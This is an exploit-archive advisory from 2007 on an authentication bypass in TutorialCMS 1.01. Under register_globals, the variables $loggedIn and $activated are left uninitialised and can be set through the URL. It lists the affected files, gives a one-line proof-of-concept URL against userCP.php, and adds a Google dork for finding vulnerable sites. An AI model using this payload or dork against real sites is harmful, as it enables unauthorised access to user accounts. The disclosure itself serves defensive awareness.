TutorialCMS <= 1.01 Authentication Bypass Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TutorialCMS <= 1.01 Authentication Bypass Vulnerability
# Published : 2007-05-21
# Author : Silentz
# Previous Title : Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities
# Next Title : Ol Bookmarks Manager 0.7.4 Remote SQL Injection Vulnerability

#################################################################################
#										#
#		     TutorialCMS <= 1.01 Authentication Bypass			#
#										#
# Discovered by: Silentz							#
# Payload: Authentication Bypass						#
# Website: http://www.w4ck1ng.com						#
# 										#
# Vulnerability:								#
#										#
#	Variables $loggedIn & $activated are not predefined.			#
#										#
# Vulnerable Files:								#
#      										#
#	login.php								#
#	headerLinks.php								#
#	submit1.php								#
#	myFav.php								#
#	userCP.php								#
#										#
#										#
# PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1		#
# 										#
# Subject To: register_globals set to on					#
# GoogleDork: "Powered By Photoshop Tutorials" 					#
#										#
# Shoutz: The entire w4ck1ng community						#
#										#
# Notes to developers:								#
#										#
#	You should allways fully disclose the vulnerabilities before someone	#
#       else does, just looks better. Also, try changing the "Date Modified" 	#
#	stamp on the files before you wrap it up for upload ;)			#
#										#
#################################################################################

# www.Syue.com [2007-05-21]